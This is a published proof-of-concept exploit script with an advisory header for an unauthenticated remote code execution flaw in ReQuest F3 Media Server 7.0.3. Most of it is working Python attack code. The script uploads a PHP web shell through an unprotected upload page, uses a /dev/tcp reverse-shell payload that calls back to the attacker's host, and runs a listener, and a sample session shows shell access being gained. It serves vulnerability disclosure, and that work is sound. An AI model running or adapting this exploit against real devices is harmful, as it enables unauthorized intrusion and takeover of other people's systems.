ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution

`#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
#  
#  
# ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution  
#   
#   
# Vendor: ReQuest Serious Play LLC  
# Product web page: http://www.request.com  
# Affected version: 7.0.3.4968 (Pro)  
# 7.0.2.4954  
# 6.5.2.4954  
# 6.4.2.4681  
# 6.3.2.4203  
# 2.0.1.823  
#   
# Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers  
# into a compact powerhouse. With the ability to add unlimited NAS devices, the  
# F3 can handle your entire family's media collection with ease.  
#   
# Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote  
# code execution vulnerability. Abusing the hidden ReQuest Internal Utilities  
# page (/tools) from the services provided, an attacker can exploit the Quick  
# File Uploader (/tools/upload.html) page and upload PHP executable files that  
# results in remote code execution as the web server user.  
#  
# =============================================================================  
# lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161  
# Let's see waddup...  
# Good to go.  
# Starting handler on port 6161.  
# Writing callback file...  
# We got the dir: /75302IV29ZS1  
# Checking write status...  
# All is well John Spartan. Calling your listener...  
# Connection from 192.168.0.17:42057  
# You got shell.  
# id;uname -ro  
# uid=81(apache) gid=81(apache) groups=81(apache),666(arq)  
# 3.2.0-4-686-pae GNU/Linux  
# exit  
# *** Connection closed by remote host ***  
# lqwrm@metalgear:~/prive$  
# =============================================================================  
#   
# Tested on: ReQuest Serious Play® OS v7.0.1  
# ReQuest Serious Play® OS v6.0.0  
# Debian GNU/Linux 5.0  
# Linux 3.2.0-4-686-pae  
# Linux 2.6.36-request+lenny.5  
# Apache/2.2.22  
# Apache/2.2.9  
# PHP/5.4.45  
# PHP/5.2.6-1  
#   
#   
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# Macedonian Information Security Research and Development Laboratory  
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience  
#   
#   
# Advisory ID: ZSL-2020-5602  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php  
#   
#   
# 01.08.2020  
#  
  
from time import sleep  
import threading######  
import telnetlib######  
import requests#######  
import socket#########  
import sys############  
import re#############  
  
class Manhattan:  
  
def __init__(self):  
self.secretagent = "Mushu"  
self.payload = None  
self.deploy = None  
self.rhost = None  
self.lhost = None  
self.lport = None  
  
def the_args(self):  
if len(sys.argv) != 4:  
self.the_usage()  
else:  
self.rhost = sys.argv[1]  
self.lhost = sys.argv[2]  
self.lport = int(sys.argv[3])  
if not "http" in self.rhost:  
self.rhost = "http://{}".format(self.rhost)  
  
def the_usage(self):  
self.the_wha()  
print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0]))  
print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0]))  
exit(0)  
  
def the_wha(self):  
titl = "ReQuest Serious Play F3 Media Server RCE"  
print(titl)  
  
def the_check(self):  
print("Let's see waddup...")  
try:  
r = requests.get(self.rhost + "/MP3/")  
if "000000000000" in r.text:  
print("Good to go.")  
else:  
print("Something's fishy.")  
exit(-16)  
except Exception as e:  
print("Hmmm {msg}".format(msg=e))  
exit(-1)  
  
def the_upload(self):  
print("Writing callback file...")  
self.headers = {"Cache-Control" : "max-age=0",   
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP",  
"User-Agent": self.secretagent,  
"Accept" : "*/*",  
"Accept-Encoding": "gzip, deflate",  
"Accept-Language": "en-US,en;q=0.9",  
"Connection": "close"}  
  
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + " <&1;rm bd0.php'\");"  
  
self.deploy = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"########  
self.deploy += "Content-Disposition: form-data; name=\"uploa" #  
self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T" #  
self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload  
self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte"  
self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm"  
self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n"  
  
requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy)  
sleep(1)  
r = requests.get(self.rhost + "/MP3/")  
regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2]  
print("We got the dir: /" + regex)  
print("Checking write status...")  
r = requests.get(self.rhost + "/MP3/" + regex)  
if "bd0" in r.text:  
print("All is well John Spartan. Calling your listener...")  
else:  
print("Something...isn't right.")  
exit(-16)   
requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php")   
  
def the_subp(self):  
konac = threading.Thread(name="ZSL", target=self.the_ear)  
konac.start()  
sleep(1)  
self.the_upload()  
  
def the_ear(self):  
telnetus = telnetlib.Telnet()  
print("Starting handler on port {}.".format(self.lport))  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.bind(("0.0.0.0", self.lport))  
while True:  
try:  
s.settimeout(7)  
s.listen(1)  
conn, addr = s.accept()  
print("Connection from {}:{}".format(addr[0], addr[1]))  
telnetus.sock = conn  
except socket.timeout as p:  
print("Hmmm ({msg})".format(msg=p))  
s.close()  
exit(0)  
break  
  
print("You got shell.")  
telnetus.interact()  
conn.close()  
  
def main(self):  
self.the_args()  
self.the_check()  
self.the_subp()  
  
if __name__ == '__main__':  
Manhattan().main()  
`